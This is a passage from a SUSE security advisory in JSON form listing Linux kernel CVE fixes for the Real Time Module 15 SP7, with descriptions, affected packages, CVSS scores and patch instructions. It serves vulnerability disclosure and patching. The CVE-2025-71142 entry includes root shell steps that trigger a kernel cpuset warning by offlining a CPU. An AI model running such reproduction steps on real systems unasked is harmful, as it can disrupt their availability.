"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71135"
},
{
"cve": "CVE-2025-71136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status()\n\nIt\u0027s possible for cp_read() and hdmi_read() to return -EIO. Those\nvalues are further used as indexes for accessing arrays.\n\nFix that by checking return values where it\u0027s needed.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71136",
"url": "https://www.suse.com/security/cve/CVE-2025-71136"
},
{
"category": "external",
"summary": "SUSE Bug 1256759 for CVE-2025-71136",
"url": "https://bugzilla.suse.com/1256759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71136"
},
{
"cve": "CVE-2025-71137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: fix \"UBSAN: shift-out-of-bounds error\"\n\nThis patch ensures that the RX ring size (rx_pending) is not\nset below the permitted length. This avoids UBSAN\nshift-out-of-bounds errors when users passes small or zero\nring sizes via ethtool -G.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71137",
"url": "https://www.suse.com/security/cve/CVE-2025-71137"
},
{
"category": "external",
"summary": "SUSE Bug 1256760 for CVE-2025-71137",
"url": "https://bugzilla.suse.com/1256760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71137"
},
{
"cve": "CVE-2025-71138",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71138"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Add missing NULL pointer check for pingpong interface\n\nIt is checked almost always in dpu_encoder_phys_wb_setup_ctl(), but in a\nsingle place the check is missing.\nAlso use convenient locals instead of phys_enc-\u003e* where available.\n\nPatchwork: https://patchwork.freedesktop.org/patch/693860/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71138",
"url": "https://www.suse.com/security/cve/CVE-2025-71138"
},
{
"category": "external",
"summary": "SUSE Bug 1256785 for CVE-2025-71138",
"url": "https://bugzilla.suse.com/1256785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71138"
},
{
"cve": "CVE-2025-71141",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71141"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tilcdc: Fix removal actions in case of failed probe\n\nThe drm_kms_helper_poll_fini() and drm_atomic_helper_shutdown() helpers\nshould only be called when the device has been successfully registered.\nCurrently, these functions are called unconditionally in tilcdc_fini(),\nwhich causes warnings during probe deferral scenarios.\n\n[ 7.972317] WARNING: CPU: 0 PID: 23 at drivers/gpu/drm/drm_atomic_state_helper.c:175 drm_atomic_helper_crtc_duplicate_state+0x60/0x68\n...\n[ 8.005820] drm_atomic_helper_crtc_duplicate_state from drm_atomic_get_crtc_state+0x68/0x108\n[ 8.005858] drm_atomic_get_crtc_state from drm_atomic_helper_disable_all+0x90/0x1c8\n[ 8.005885] drm_atomic_helper_disable_all from drm_atomic_helper_shutdown+0x90/0x144\n[ 8.005911] drm_atomic_helper_shutdown from tilcdc_fini+0x68/0xf8 [tilcdc]\n[ 8.005957] tilcdc_fini [tilcdc] from tilcdc_pdev_probe+0xb0/0x6d4 [tilcdc]\n\nFix this by rewriting the failed probe cleanup path using the standard\ngoto error handling pattern, which ensures that cleanup functions are\nonly called on successfully initialized resources. Additionally, remove\nthe now-unnecessary is_registered flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71141",
"url": "https://www.suse.com/security/cve/CVE-2025-71141"
},
{
"category": "external",
"summary": "SUSE Bug 1256756 for CVE-2025-71141",
"url": "https://bugzilla.suse.com/1256756"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71141"
},
{
"cve": "CVE-2025-71142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71142"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpuset: fix warning when disabling remote partition\n\nA warning was triggered as follows:\n\nWARNING: kernel/cgroup/cpuset.c:1651 at remote_partition_disable+0xf7/0x110\nRIP: 0010:remote_partition_disable+0xf7/0x110\nRSP: 0018:ffffc90001947d88 EFLAGS: 00000206\nRAX: 0000000000007fff RBX: ffff888103b6e000 RCX: 0000000000006f40\nRDX: 0000000000006f00 RSI: ffffc90001947da8 RDI: ffff888103b6e000\nRBP: ffff888103b6e000 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000001 R11: ffff88810b2e2728 R12: ffffc90001947da8\nR13: 0000000000000000 R14: ffffc90001947da8 R15: ffff8881081f1c00\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f55c8bbe0b2 CR3: 000000010b14c000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n update_prstate+0x2d3/0x580\n cpuset_partition_write+0x94/0xf0\n kernfs_fop_write_iter+0x147/0x200\n vfs_write+0x35d/0x500\n ksys_write+0x66/0xe0\n do_syscall_64+0x6b/0x390\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f55c8cd4887\n\nReproduction steps (on a 16-CPU machine):\n\n # cd /sys/fs/cgroup/\n # mkdir A1\n # echo +cpuset \u003e A1/cgroup.subtree_control\n # echo \"0-14\" \u003e A1/cpuset.cpus.exclusive\n # mkdir A1/A2\n # echo \"0-14\" \u003e A1/A2/cpuset.cpus.exclusive\n # echo \"root\" \u003e A1/A2/cpuset.cpus.partition\n # echo 0 \u003e /sys/devices/system/cpu/cpu15/online\n # echo member \u003e A1/A2/cpuset.cpus.partition\n\nWhen CPU 15 is offlined, subpartitions_cpus gets cleared because no CPUs\nremain available for the top_cpuset, forcing partitions to share CPUs with\nthe top_cpuset. In this scenario, disabling the remote partition triggers\na warning stating that effective_xcpus is not a subset of\nsubpartitions_cpus. Partitions should be invalidated in this case to\ninform users that the partition is now invalid(cpus are shared with\ntop_cpuset).\n\nTo fix this issue:\n1. Only emit the warning only if subpartitions_cpus is not empty and the\n effective_xcpus is not a subset of subpartitions_cpus.\n2. During the CPU hotplug process, invalidate partitions if\n subpartitions_cpus is empty.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71142",
"url": "https://www.suse.com/security/cve/CVE-2025-71142"
},
{
"category": "external",
"summary": "SUSE Bug 1256748 for CVE-2025-71142",
"url": "https://bugzilla.suse.com/1256748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71142"
},
{
"cve": "CVE-2025-71143",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71143"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: samsung: exynos-clkout: Assign .num before accessing .hws\n\nCommit f316cdff8d67 (\"clk: Annotate struct clk_hw_onecell_data with\n__counted_by\") annotated the hws member of \u0027struct clk_hw_onecell_data\u0027\nwith __counted_by, which informs the bounds sanitizer (UBSAN_BOUNDS)\nabout the number of elements in .hws[], so that it can warn when .hws[]\nis accessed out of bounds. As noted in that change, the __counted_by\nmember must be initialized with the number of elements before the first\narray access happens, otherwise there will be a warning from each access\nprior to the initialization because the number of elements is zero. This\noccurs in exynos_clkout_probe() due to .num being assigned after .hws[]\nhas been accessed:\n\n UBSAN: array-index-out-of-bounds in drivers/clk/samsung/clk-exynos-clkout.c:178:18\n index 0 is out of range for type \u0027clk_hw *[*]\u0027\n\nMove the .num initialization to before the first access of .hws[],\nclearing up the warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71143",
"url": "https://www.suse.com/security/cve/CVE-2025-71143"
},
{
"category": "external",
"summary": "SUSE Bug 1256749 for CVE-2025-71143",
"url": "https://bugzilla.suse.com/1256749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
